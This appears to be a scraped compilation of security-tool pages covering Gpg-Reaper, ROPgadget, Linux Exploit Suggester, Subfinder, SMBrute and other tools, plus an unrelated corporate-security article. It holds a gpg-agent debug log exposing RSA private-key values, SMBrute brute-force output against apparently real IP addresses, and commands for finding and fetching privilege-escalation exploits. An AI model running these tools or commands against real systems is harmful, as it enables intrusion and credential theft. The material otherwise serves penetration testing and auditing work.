2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty - -
2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END
2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache '590A068768B6A5CB4DD81CD4828C72AD8427DFE4' (mode 2) requested ttl=0
2018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key
2018-03-04 18:21:18 gpg-agent[7180] DBG: (rsa
2018-03-04 18:21:18 gpg-agent[7180] DBG: (n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
2018-03-04 18:21:18 gpg-agent[7180] DBG: (e #010001#)
2018-03-04 18:21:18 gpg-agent[7180] DBG: (d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
2018-03-04 18:21:18 gpg-agent[7180] DBG: (p #00ED6EA59EE03412314BF288629568237A649FACC88C5D6E2F266A58D1CF6BA26254526F916FF7CFC6AF5B5ED0618CE00099DCFB9CB1F7C6BAD6945A8125ECD6A352E8056644A7336FFE2C203B098ED7767FD51101FD4842F1DED870DFD4D1F947D5FB7AB13E318C977AB875F86785F8B98260BB3BA1F6133D03C9296F22875E23#)
2018-03-04 18:21:18 gpg-agent[7180] DBG: (q #00FE67215C9C6FEF8C21C81A9B34AAB91FCD321D95E3641D7EFE4B89BBAD918CF94068AC89440147ED07E68EC65997568921DE740A504D2D99DDB997BE7DE09228678F544226F2D75F62447AECD7385773D9A7B0EF272B5CF4F32B4EFCB1B0B81893DE768B692D350CFB6B32A683DF773D66169A436DC233AD412FD438E366B6D5#)
2018-03-04 18:21:18 gpg-agent[7180] DBG: (u #17BA591E668D2D78B1C74E5820A9FE31481232D34B6EBBC2004767512AD4835A42B0621EBE6CD4359BFD9B8DDA3DF234471C99B1CF553EBCF5019452143360FEC051024E43063913DD7A36FA1CA12C02FEAF07C4A4DA50C5286264BC38333C85371B13C704B1FA0265FA4DF17CC1E02B9E37ACA7D72AE40413CA6E5548107299#)))
2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data
2018-03-04 18:21:18 gpg-agent[7180] DBG: (flags pkcs1)
2018-03-04 18:21:18 gpg-agent[7180] DBG: (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))
It looks like guru mode prints the n, e, d, p, q and u numbers to the log file. Knowing this we can calculate the public and private key.
Internally the skey value is printed by gcry_log_debugsxp() when DBG_CRYPTO is set:
if (DBG_CRYPTO)
{
gcry_log_debugsxp ("skey", s_skey);
gcry_log_debugsxp ("hash", s_hash);
}

FAQ
  1. Why PowerShell?
Because this file can be run without any external dependencies on most modern Windows systems.
  2. GPG %file% not exist
gpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in the default location.
You can try to specify a custom location using:
Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exe
  3. No gpg-agent running
gpg-agent.exe is not running on this system so we cannot restore the private key.
  4. Unknown gpg-agent version, sha256:
Currently this script supports only specific versions.
  5. No cached key
There is no cached key in memory so we cannot restore the private key.

Attribution
Scythe icon made by Freepik from www.flaticon.com.
Solstice Of Suffering font by GraveTech.



ROPgadget - This Tool Lets You Search Your Gadgets On Your Binaries To Facilitate Your ROP Exploitation


This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures. Since version 5, ROPgadget has a new core which is written in Python using the Capstone disassembly framework for the gadget search engine. The older version can be found in the Archives directory but it will not be maintained.

Install
If you want to use ROPgadget, you have to install Capstone first.
To install Capstone on a *nix machine:
$ sudo pip install capstone
Capstone supports multiple platforms (Windows, iOS, Android, Cygwin...). For cross-compilation, please refer to the https://github.com/aquynh/capstone/blob/master/COMPILE.TXT file.
After Capstone is installed, ROPgadget can be used as a standalone tool:
$ ROPgadget.py
Or installed into the Python site-packages library, and executed from $PATH.
$ python setup.py install
$ ROPgadget
Or installed from PyPi
$ pip install ropgadget
$ ROPgadget

Usage
usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>]
[--string <string>] [--memstr <string>] [--depth <nbyte>]
[--only <key>] [--filter <key>] [--range <start-end>]
[--badbytes <byte>] [--rawArch <arch>] [--rawMode <mode>]
[--re <re>] [--offset <hexaddr>] [--ropchain] [--thumb]
[--console] [--norop] [--nojop] [--nosys] [--multibr]
[--all] [--dump]

optional arguments:
-h, --help show this help message and exit
-v, --version Display the ROPgadget's version
-c, --checkUpdate Checks if a new version is available
--binary <binary> Specify a binary filename to analyze
--opcode <opcodes> Search opcode in executable segment
--string <string> Search string in readable segment
--memstr <string> Search each byte in all readable segment
--depth <nbyte> Depth for search engine (default 10)
--only <key> Only show specific instructions
--filter <key> Suppress specific instructions
--range <start-end> Search between two addresses (0x...-0x...)
--badbytes <byte> Rejects specific bytes in the gadget's address
--rawArch <arch> Specify an arch for a raw file
--rawMode <mode> Specify a mode for a raw file
--re <re> Regular expression
--offset <hexaddr> Specify an offset for gadget addresses
--ropchain Enable the ROP chain generation
--thumb Use the thumb mode for the search engine (ARM only)
--console Use an interactive console for search engine
--norop Disable ROP search engine
--nojop Disable JOP search engine
--callPreceded Only show gadgets which are call-preceded (x86 only)
--nosys Disable SYS search engine
--multibr Enable multiple branch gadgets
--all Disables the removal of duplicate gadgets
--dump Outputs the gadget bytes

Screenshots







Linux Exploit Suggester - Linux Privilege Escalation Auditing Tool


Often during a penetration test engagement the security analyst faces the problem of identifying privilege escalation attack vectors on the tested Linux machine(s). One viable attack vector is using a publicly known Linux exploit to gain root privileges on the tested machine. Of course, in order to do that the analyst needs to identify the right PoC exploit, make sure that his target is affected by the associated vulnerability and finally modify the exploit to suit his target. The linux-exploit-suggester.sh tool is designed to help with these activities.

Overview
The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on a Linux machine. It provides the following features:

"Remote" mode (--kernel or --uname switches)
In this mode the analyst simply provides the kernel version (--kernel switch) or the uname -a command output (--uname switch) and receives a list of candidate exploits for the given kernel version.
Using this mode one can also check for candidate user space exploits (with the --pkglist-file switch) if he has access to the installed package listing (output of the dpkg -l/rpm -qa commands) of the examined system.

"Direct" mode (default run)
The basic idea behind this mode is the same as above, but in an effort to produce a more relevant list of candidate exploits the tool also performs a series of additional checks (kernel build settings, aka CONFIG_*, sysctl entries and other custom checks) to rule out exploits that for sure won't be applicable due to OS customization. So for example, for the 'af_packet' exploit, whose requirements look like this:
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
the script (in addition to checking the kernel version) will check whether the target kernel was built with CONFIG_USER_NS and whether the sysctl entry kernel.unprivileged_userns_clone is enabled. Optionally these additional checks can be skipped by running with the --skip-more-checks command line switch.
By default the tool also checks for applicable user space exploits when the distribution is one of Debian, Ubuntu, RHEL/CentOS/Fedora. To skip the user space exploit checks one can run with the --kernelspace-only switch.

"CVE list" mode (--cvelist-file switch)
In this mode the analyst already possesses a partial/full list of CVEs that affect his target kernel and wants to verify whether there are any publicly known exploits for these CVEs. Of course the effectiveness of this mode highly depends on the completeness of the provided CVE list. Such a list is usually constructed by manual study and examination of the distribution's changelog for the given kernel version. Alternatively, for the most popular distros, Oracle's Ksplice Inspector could be used to speed up this process. For example, the following oneliner worked quite fine for me:
$ (uname -s; uname -m; uname -r; uname -v) | curl -s https://api-ksplice.oracle.com/api/1/update-list/ -L -H "Accept: text/text" --data-binary @- | grep CVE | tr ' ' '\n' | grep -o -E 'CVE-[0-9]+-[0-9]+' | sort -r -n | uniq
WARNING. By default, in addition to comparing CVE IDs, this mode also performs additional checks to rule out exploits that won't be applicable due to OS customization (kernel build settings aka CONFIG_*, sysctl entries and other custom settings). So for the best possible results one should run it directly on the tested machine, or alternatively use the --skip-more-checks command line switch if running on the target is not possible/not desired.
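The requirement matching that the "Direct" and "CVE list" modes above describe, as an added example written in Python rather than the script's own bash (this is not code from linux-exploit-suggester): a small evaluator for Reqs strings against a host profile, an optional CVE-list filter, and the CVE-id extraction that the oneliner does with grep/sort/uniq. The host profile, the catalogue entries, their names and the CVE-0000-000x ids are constructed placeholders for this example. For a defender the unmet-requirement list is the useful output: it shows which single setting (here a sysctl) keeps a published exploit from applying, and therefore which settings are worth enforcing.

```python
import re

# Constructed host profile: what the script collects on the audited machine
# (kernel version, CONFIG_* build settings, sysctl values, package versions).
# Sample data for this example, not a real system.
HOST = {
    "kernel": "4.4.0-31-generic",
    "config": {"CONFIG_USER_NS": "y", "CONFIG_BPF_SYSCALL": "y"},
    "sysctl": {"kernel.unprivileged_userns_clone": "1",
               "kernel.unprivileged_bpf_disabled": "1"},
    "packages": {"sudo": "1.8.16"},
}

# Constructed catalogue in the Reqs format; names and CVE ids are placeholders
# (CVE-0000-000x), not entries from linux-exploit-suggester.
CATALOGUE = [
    {"name": "example_userns", "cve": "CVE-0000-0001",
     "reqs": "pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,"
             "sysctl:kernel.unprivileged_userns_clone==1"},
    {"name": "example_bpf", "cve": "CVE-0000-0002",
     "reqs": "pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,"
             "sysctl:kernel.unprivileged_bpf_disabled==0"},
    {"name": "example_old_kernel", "cve": "CVE-0000-0003",
     "reqs": "pkg=linux-kernel,ver>=2.6.22,ver<=3.9"},
    {"name": "example_sudo", "cve": "CVE-0000-0004",
     "reqs": "pkg=sudo,ver>=1.8.0,ver<1.8.20"},
    {"name": "example_missing_pkg", "cve": "CVE-0000-0005",
     "reqs": "pkg=exim4,ver<4.90"},
]

_VER_RE = re.compile(r"^ver(>=|<=|==|=|>|<)(\S+)$")
CVE_RE = re.compile(r"CVE-[0-9]+-[0-9]+")


def parse_version(text):
    """'4.4.0-31-generic' -> (4, 4, 0): only the numeric fields before the
    first '-' count, which is how a plain kernel release compares."""
    return tuple(int(n) for n in re.findall(r"\d+", text.split("-")[0]))


def _cmp_version(a, b):
    """-1, 0 or 1 for a < b, a == b, a > b, padding short tuples with zeros."""
    va, vb = parse_version(a), parse_version(b)
    width = max(len(va), len(vb))
    va += (0,) * (width - len(va))
    vb += (0,) * (width - len(vb))
    return (va > vb) - (va < vb)


def check_requirements(reqs, host, skip_more_checks=False):
    """Evaluate one Reqs string against the host profile and return the list of
    unmet tokens (empty list = the exploit is a candidate for this host).
    With skip_more_checks=True only pkg/ver tokens are evaluated, like the
    script's --skip-more-checks switch."""
    unmet = []
    subject = host["kernel"]          # version the ver tokens refer to
    for token in reqs.split(","):
        token = token.strip()
        if token.startswith("pkg="):
            pkg = token[4:]
            if pkg == "linux-kernel":
                subject = host["kernel"]
            elif pkg in host.get("packages", {}):
                subject = host["packages"][pkg]
            else:                      # package not installed at all
                subject = None
                unmet.append(token)
            continue
        m = _VER_RE.match(token)
        if m:
            op, wanted = m.groups()
            if subject is None:
                unmet.append(token)
                continue
            c = _cmp_version(subject, wanted)
            ok = {">=": c >= 0, "<=": c <= 0, ">": c > 0, "<": c < 0,
                  "==": c == 0, "=": c == 0}[op]
            if not ok:
                unmet.append(token)
            continue
        if skip_more_checks:
            continue
        if token.startswith("sysctl:"):
            key, _, val = token[len("sysctl:"):].partition("==")
            if host["sysctl"].get(key) != val:
                unmet.append(token)
        elif token.startswith("CONFIG_"):
            key, _, val = token.partition("=")
            if host["config"].get(key) != val:
                unmet.append(token)
        else:
            unmet.append("unknown:" + token)
    return unmet


def candidate_exploits(catalogue, host, cve_list=None, skip_more_checks=False):
    """Names of entries the host satisfies. With cve_list, only entries whose
    CVE is on the list are considered (the --cvelist-file mode), and the extra
    CONFIG_*/sysctl checks still apply unless skip_more_checks is set."""
    return [e["name"] for e in catalogue
            if (cve_list is None or e["cve"] in cve_list)
            and not check_requirements(e["reqs"], host, skip_more_checks)]


def extract_cves(text):
    """Unique, sorted CVE ids in free text: what the grep/sort/uniq pipeline of
    the oneliner above does to the Ksplice response."""
    return sorted(set(CVE_RE.findall(text)))
```

Note how the same catalogue yields a longer candidate list with skip_more_checks=True: the bpf entry is ruled out only by the kernel.unprivileged_bpf_disabled sysctl, which is exactly the kind of setting the direct mode exists to take into account.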

"Check security" mode (--checksec switch)
WARNING. This mode is currently in beta.
This mode is meant to be a modern continuation of checksec.sh's --kernel switch functionality.
In this mode linux-exploit-suggester.sh enumerates the target system for various kernel/hardware security features (KASLR, SMEP, etc.) and settings. It checks whether a given protection mechanism is available (built into the kernel): [ Available ], and (if applicable) whether it can be disabled/enabled without recompiling the kernel (via a sysctl entry or other means): [ Enabled/Disabled ], or shows [ N/A ] if disabling/enabling is not possible/not supported.

Tips, limitations, caveats
  • Remember that this script is only meant to assist the analyst in his auditing activities. It won't do all the work for him!
  • It's the analyst's job to determine whether the given target is patched against the generated list of candidate exploits (the script doesn't look at the distro patch level, so obviously it won't do that for you)
  • In addition to manual inspection, Oracle's Ksplice Inspector could come in handy for determining the previous point
  • The selected exploit will almost certainly need some customization to suit your target (at minimum: correct commit_creds/prepare_kernel_cred pointers), so knowledge of kernel exploitation techniques is required

Usage
Default run on the target machine (kernel version, package versions and the additional checks described in the "Overview" paragraph are performed to give the list of possible exploits):
$ ./linux-exploit-suggester.sh
As previously but only userspace exploits are checked:
$ ./linux-exploit-suggester.sh --userspace-only
Check if exploit(s) for given list of CVE IDs are available:
$ ./linux-exploit-suggester.sh --cvelist-file <cve-listing-file> --skip-more-checks
Generate list of CVEs for the target kernel and check if exploit(s) for it exists (also performs additional checks):
$ (uname -s; uname -m; uname -r; uname -v) | curl -s https://api-ksplice.oracle.com/api/1/update-list/ -L -H "Accept: text/text" --data-binary @- | grep CVE | tr ' ' '\n' | grep -o -E 'CVE-[0-9]+-[0-9]+' | sort -r -n | uniq > <cve-listing-file>
$ ./linux-exploit-suggester.sh --cvelist-file <cve-listing-file>
List available hardware/kernel security mechanisms for target machine:
$ ./linux-exploit-suggester.sh --checksec
Running with the -k option is handy if one wants to quickly examine which exploits could potentially be applicable for a given kernel version (this is also the compatibility mode with Linux_Exploit_Suggester):
$ ./linux-exploit-suggester.sh -k 3.1
With --uname one provides slightly more information (the uname -a output from the target machine) to linux-exploit-suggester.sh and receives a slightly more specific list of possible exploits (for example, the target arch x86|x86_64 is also taken into account when generating the exploit list):
$ ./linux-exploit-suggester.sh --uname "Linux taris 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux"
Optionally --pkglist-file <file> can be provided with -k or --uname to also check for user space exploits:
(remote machine) $ dpkg -l > dpkgOutput.txt
$ ./linux-exploit-suggester.sh --uname "Linux taris 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux" --pkglist-file dpkgOutput.txt
In terms of the generated list of exploits this is identical to executing (directly on the given remote machine):
(remote machine) $ ./linux-exploit-suggester.sh --skip-more-checks
Sometimes it is desirable to examine only the package listing (in this case only the check for user space exploits is performed):
(remote machine) $ dpkg -l > dpkgOutput.txt
$ ./linux-exploit-suggester.sh --pkglist-file dpkgOutput.txt
As previously, but no package versioning is performed (handy for a quick preliminary check of whether any package for which a user space exploit is available is installed):
$ ./linux-exploit-suggester.sh --pkglist-file dpkgOutput.txt --skip-pkg-versions
The kernel version number is taken from the current OS, sources for possible exploits are downloaded to the current directory (only kernel space exploits are examined):
$ ./linux-exploit-suggester.sh --fetch-sources --kernelspace-only
The kernel version number is taken from the command line; full details (kernel version requirements, comments and the URL pointing to the announcement/technical details about the exploit) about matched exploits are listed:
$ ./linux-exploit-suggester.sh -k 4.1 --full
The kernel version number is taken from the current OS, binaries for applicable exploits are downloaded (if available) to the current directory, additional checks are skipped:
$ ./linux-exploit-suggester.sh --fetch-binaries --skip-more-checks
Note however that --fetch-binaries is not recommended, as it downloads binaries from generally untrusted sources and most likely these binaries weren't compiled for your target anyway. It should be used as a kind of last resort option when you're running out of time during your pen testing engagement and there is no compiler available on your target at hand.

Misc
  • The tool was inspired by the Linux_Exploit_Suggester script and it contains all the exploits that are present there (for kernels 2.6+) plus all more recent Linux kernel exploits
  • It is available in BlackArch distribution
  • I'm not responsible for how the tool is used and where it is used

Quick download:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh


Subfinder - Subdomain Discovery Tool That Can Discover Massive Amounts Of Valid Subdomains For Any Target


SubFinder is a subdomain discovery tool that uses various techniques to discover massive amounts of subdomains for any target. It is aimed as a successor to the sublist3r project. SubFinder uses passive sources, search engines, pastebins, internet archives, etc. to find subdomains, and then it uses a permutation module inspired by altdns to generate permutations and resolve them quickly using a powerful bruteforcing engine. It can also perform plain bruteforce if needed. The tool is highly customizable, and the code is built with a modular approach in mind, making it easy to add functionality and remove errors.

Why?
This project began its life as a Bug Bounty World slack channel discussion. @ice3man & @codingo were talking about how the cornerstone subdomain tool at the time, sublist3r, appeared to have been abandoned. The goal of this project was to make a low-dependency, manageable project in Go that would continue to be maintained over time. @Ice3man decided to rewrite the sublist3r project and posted about it. @codingo offered to contribute to the project and subfinder was born.

Features
  • Simple and modular code base making it easy to contribute.
  • Fast And Powerful Bruteforcing Module (In Development)
  • Powerful Permutation generation engine. (In Development)
  • Many Passive Data Sources (CertDB, CertSpotter, crtsh, DNSDumpster, FindSubdomains, Hackertarget, Netcraft, PassiveTotal, PTRArchive, SecurityTrails, Threatcrowd, VirusTotal)
  • Internet Archives support for finding subdomains (In development)

Install
The installation is easy. Git clone the repo and run go build.
go get github.com/ice3man543/subfinder
To configure it to work with certain services, you need to have an API key for them. These are the services that do not work without an API key.
Put these values in the config.json file and you should be good to go.
If your $GOPATH is /home/go, make sure to place your config.json file in the $GOPATH/bin folder or wherever you have the binary. Otherwise, it will not work.


Sandcat Browser 6.0 - Pentest And Developer-Oriented Web Browser


Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/. See also the docs directory and credits section below for a few more details about the Sandcat architecture.

Directories
  • /docs - Lua API documentation
  • /packs - contents of uncompressed pack files
  • /Common - common CSS, widgets and scripts package (Common.pak)
  • /Resources - resources package (Resources.pak)
  • /src - the main executable source and built-in resource files
  • /core - user interface source
  • /html - user interface resources (HTML)
  • /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

Compiling
For compiling Sandcat, you will just need Catarinka and pLua.
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog
  • Request Viewer rewrite - with better display of requests and stability fixes.
  • Disabled Chromium's XSS protection when in pentest mode.
  • Simplified the tabbed UI - major tab code clean up and reorganization.
  • Added drag and drop for items in the list editor.
  • Fixed: occasional crash when extension called events of Lua objects.
  • Additional stability.

Contact
Email: felipe at syhunt.com
If you want to report a security bug, please see the docs\SECURITY.md file.


PenCrawLer - An Advanced Web Crawler And DirBuster


PeNCrawLer is an advanced web crawler and dirbuster designed for use in penetration testing on Windows.

Web Crawler Features:
  • Follow Redirects
  • Rendering Javascript
  • Extract links from custom HTML-Elements
  • Extract links with Regex-Pattern
  • Black-list extensions
  • White-list extensions
  • Download files from white-list extensions
  • Setting-Up limit for crawling similar links
  • Searching for string in:
    • Url
    • Response
  • Automatic Form Submission
  • Support Http-Proxy
  • Supported Authentication:
    • Basic
    • Digest
  • Throttling mode


DirBuster Features:
  • Dictionary attack
  • Bruteforce attack
    • Custom bruteforce charset
  • Custom request method:
    • GET ONLY
    • Auto-Switch( GET and HEAD )
  • Recursive mode
  • Bruteforce directories
  • Bruteforce files with custom extensions
  • Automatic page detection by:
    • Failure status-code
    • Success status-code
    • Regex pattern
    • HTML source

SMBrute - SMB Protocol Bruteforce


SMBrute is a program that can be used to bruteforce usernames and passwords of servers that use SMB (Samba).

Install SMBrute
$ git clone https://github.com/m4ll0k/SMBrute.git smbrute
$ cd smbrute
$ pip3 install pysmb humanfriendly
$ python3 smbrute.py

Usage:
$ python3 smbrute.py -h 188.10.73.147

_____ _____ _____ _
| __| | __ |___ _ _| |_ ___
|__ | | | | __ -| _| | | _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
Version 0.1.0
Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 188.10.73.147 authentication disabled
[+] Showing folders..
------------------------------------------------
| Name | Type | Comments |
------------------------------------------------
| Multimedia | 0 | System default share |
| Download | 0 | System default share |
| Recordings | 0 | System default share |
| Web | 0 | System default share |
| Public | 0 | System default share |
| homes | 0 | System default share |
| Archivio | 0 | |
| FTP | 0 | ftp |
| home | 0 | Home |
| Qsync | 0 | Qsync |
| IPC$ | 3 | IPC Service (NAS Server) |
------------------------------------------------

Show Files:
$ python3 smbrute.py -h 188.10.73.147 -f FTP

_____ _____ _____ _
| __| | __ |___ _ _| |_ ___
|__ | | | | __ -| _| | | _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
Version 0.1.0
Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 188.10.73.147 authentication disabled
[+] Show FTP Files...
-----------------------------------------------------------
| Filename | ReadOnly |
-----------------------------------------------------------
| . | False |
| .. | False |
| mLog_27_8_17__23_00_01.csv | False |
| mLog_26_1_18__23_00_01.csv | False |
| mLog_23_1_18__23_00_01.csv | False |
| mLog_28_3_17__23_00_01.csv | False |
| mLog_21_6_17__23_00_01.csv | False |
-----------------------------------------------------------

Bruteforce Login:
$ python3 smbrute.py -h 2.35.69.44

_____ _____ _____ _
| __| | __ |___ _ _| |_ ___
|__ | | | | __ -| _| | | _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
Version 0.1.0
Momo Outaadi (M4ll0k)

----------------------------------------
[-] Host 2.35.69.44 authentication enabled
[!] Please set wordlist for bruteforcing

$ python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10

_____ _____ _____ _
| __| | __ |___ _ _| |_ ___
|__ | | | | __ -| _| | | _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
Version 0.1.0
Momo Outaadi (M4ll0k)

----------------------------------------
[-] Host 2.35.69.44 authentication enabled
[+] Start bruteforcing...
[+] Username: root Password: toor

After found credentials:
$ python3 smbrute.py -h 2.35.69.44 -u admin -p 1234

_____ _____ _____ _
| __| | __ |___ _ _| |_ ___
|__ | | | | __ -| _| | | _| -_|
|_____|_|_|_|_____|_| |___|_| |___|

SMBrute - SMB Protocol Bruteforce
Version 0.1.0
Momo Outaadi (M4ll0k)

----------------------------------------
[+] Host 2.35.69.44 authentication disabled
[+] Showing folders..
-----------------------------------------------------------------
| Name | Type | Comments |
-----------------------------------------------------------------
| IPC$ | 3 | IPC Service (WDMyCloudEX2100) |
| Recycle Bin - Volume_1 | 0 | Recycle Bin Directories |
| serverconf | 0 | |
| deleghe2 | 0 | |
| prova | 0 | |
| ebcs_site | 0 | |
| deleghe | 0 | |
| confcatania2 | 0 | |
| backup | 0 | |
| doc | 0 | doc |
| ebcs | 0 | ebcs |
| foto | 0 | foto |
| pratiche | 0 | |
| TimeMachineBackup | 0 | |
| SmartWare | 0 | |
| Public | 0 | |
-----------------------------------------------------------------


How Can Manufacturing Companies Improve Network Access and Security?


The manufacturing industry faces complex challenges other sectors of the economy need not worry about. Manufacturers rely heavily on everything from positive global economic trends to laws that lift certain burdens. And companies involved with manufacturing consistently focus on increased productivity with an eye for maintaining a cost-effective bottom line. While all these things present unique challenges, arguably the most difficult ones come from maximizing security on all levels. Computers, IT networks, and data storage locations must remain secure, or else all kinds of chaos may rain down on a company. Taking steps to improve security must be a multi-faceted process. Anything left unsecured simply presents a troubling hazard.

What contributes to security complexities in the manufacturing world? A simple answer would be "many things." One of the more specific reasons reveals itself when examining issues surrounding third-parties and manufacturing companies. Manufacturing companies do not exist as islands unto themselves.

Third-Party Concerns

Manufacturers do need to move and sell merchandise. Therefore, manufacturers maintain close relationships with distributors and vendors. To eliminate cumbersome steps and unwanted costs, third-parties may be given access to private networks and data in a manufacturing company. To speed up access, these third-parties might receive single sign on privileges. Clearly, the various third-party actors should not be accessing anything until the company has a strong permissions system in place. Controlling access and auditing those granted permissions could assist with any decisions to better enhance third-party security in the future.

Exploring the services offered by OneLogin reveals insight into how SSO and access management can be performed. Based in San Francisco, OneLogin assists many clients with access management needs. OneLogin has also published information on its website to contribute free advice on how to raise awareness about security and access management issues.

Don't Make Compromising Security Easy

Utilizing single sign on (SSO) programs does make it easier for everyone to log into a company's system. So, creating better and more complicated passwords makes sense since the sign on process has been made easier. And complicated, difficult-to-crack passwords deliver significant benefits to a manufacturing business worried about security. Stolen or otherwise compromised passwords and credentials account for a tremendous number of unauthorized breaches of a network. As shocking as it sounds, staff and management in many companies use highly common and easily guessable passwords. They also do not secure passwords. Writing down a password and leaving it on a desk or in a public place hardly cuts down on the potential for unauthorized access.

Passwords and other credentials must be kept secure. Otherwise, security breach risks increase dramatically. As simple as this basic truism remains, people don't always heed the advice.

Beware of Hackers

Actually, manufacturing companies must do more than just be on the alert for hackers. Specific steps must be taken to protect computers and networks from hackers, viruses, and other risks capable of threatening the system. Perhaps the time has arrived to bring in a security expert to perform a critical audit. If the audit reveals deficiencies, direct steps must be taken to close them up. Otherwise, an ajar or outright open security window exists to create easy access for troublemakers. Yes, there may be additional expenses required to boost computer and network security. These costs may be well worth the expense considering the protections they deliver.

Address Current Identity Management Issues

Certain identity management operational systems might be the same ones used by a company for years. The classic "support ticket" approach to dealing with network problems or concerns never seems to be upgraded at various businesses. While things may seem to be working fine, the slow, unproductive, and potentially costly nature of using an outdated system cries out for an upgrade. Identity management issues then run the risk of being improperly handled because of old and outdated approaches.

Upgrades should be performed at all levels of operations when appropriate. Companies such as OneLogin do strive to modernize access management in manufacturing and other industries. Looking at how this company works for inspiration might be worth the time commitment.




JCS - Joomla Vulnerability Component Scanner


JCS (Joomla Component Scanner) is made for penetration testing on the Joomla CMS. JCS can help you with the latest component vulnerabilities and exploits. The database can be updated from several resources, and a crawler has been implemented to find components and component links.
This version supports Exploitdb and Packetstorm vulnerabilities to create a database for Joomla components. JCS can also create a report in HTML for you.

Features:
  • Multi-Thread
  • Delay between requests
  • Custom Http Headers
  • Supports Http-Proxy
  • Supports Http Authentication:
    • BASIC
    • DIGEST
  • Component crawler based on Regex-Pattern
  • Component's Page Identification By:
    • Page Comparison
    • Regex Pattern
    • Searching in HTML tags example: <title>not found</title>
    • Checking Http Status Code

Report Sample:



RTA (Red Team Arsenal) - An Intelligent Scanner To Detect Security Vulnerabilities In Companies Layer 7 Assets


Red Team Arsenal is a web/network security scanner which has the capability to scan all of a company's online facing assets and provide a holistic security view of any security anomalies. It's a closely linked collection of security engines to conduct/simulate attacks and monitor public facing assets for anomalies and leaks.
It's an intelligent scanner detecting security anomalies in all layer 7 assets and gives a detailed report, with integration support for Nessus. As companies continue to expand their footprint on the Internet via various acquisitions and geographical expansions, human-driven security engineering is not scalable; hence, companies need feedback-driven automated systems to stay put.

Installation

Supported Platforms
RTA has been tested both on Ubuntu/Debian (apt-get based distros) and on Mac OS. It should ideally work with any Linux-based distribution with mongo and python installed (install the required python libraries from install/py_dependencies manually).

Prerequisites:
There are a few packages which are necessary before proceeding with the installation:
  • Git client: sudo apt-get install git
  • Python 2.7, which is installed by default in most systems
  • Python pip: sudo apt-get install python-pip
  • MongoDB: Read the official installation guide to install it on your machine.
Finally run python install/install.py
There are also optional packages/tools you can install (highly recommended):

Integrating Nessus:
Integrating Nessus into Red Team Arsenal can be done in four simple steps:
  • Download and install Nessus community edition (if you don't have a paid edition). If you already have an installation (it can be a remote installation as well), then go to step (2).
  • Update the config file (present in the root directory of RTA) with the Nessus URL, username and password.
  • Create a Nessus policy where you can configure the type of scans and plugins to run, and name it RTA (case sensitive - use full uppercase).
  • Once the config file has the correct Nessus information (url, username, password), use the flag --nessus while running RTA to launch a Nessus scan over all the subdomains gathered by RTA (one single scan initiated with all the subdomains gathered).

Usage
| Short Form | Long Form | Description |
| -u | --url | Domain URL to scan |
| -v | --verbose | Enable the verbose mode and display results in realtime |
| -n | --nessus | Launch a Nessus scan with all the subdomains |
| -s | --scraper | Run scraper based on config keywords |
| -h | --help | Show the help message and exit |

Sample Output
a0xnirudh@exploitbox /RTA (master*) $ python rta.py --url "0daylabs.com" -v -s

____ _ _____ _ _
| _ \ ___ __| | |_ _|__ __ _ _ __ ___ / \ _ __ ___ ___ _ __ __ _| |
| |_) / _ \/ _` | | |/ _ \/ _` | '_ ` _ \ / _ \ | '__/ __|/ _ \ '_ \ / _` | |
| _ < __/ (_| | | | __/ (_| | | | | | | / ___ \| | \__ \ __/ | | | (_| | |
|_| \_\___|\__,_| |_|\___|\__,_|_| |_| |_| /_/ \_\_| |___/\___|_| |_|\__,_|_|


[i] Checking for Zonetransfer
[i] Zone Transfer is not enabled

[i] Checking for SPF records
[+] SPF record lookups is good. Current value is: 9

[-] Enumerating subdomains now for 0daylabs.com
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
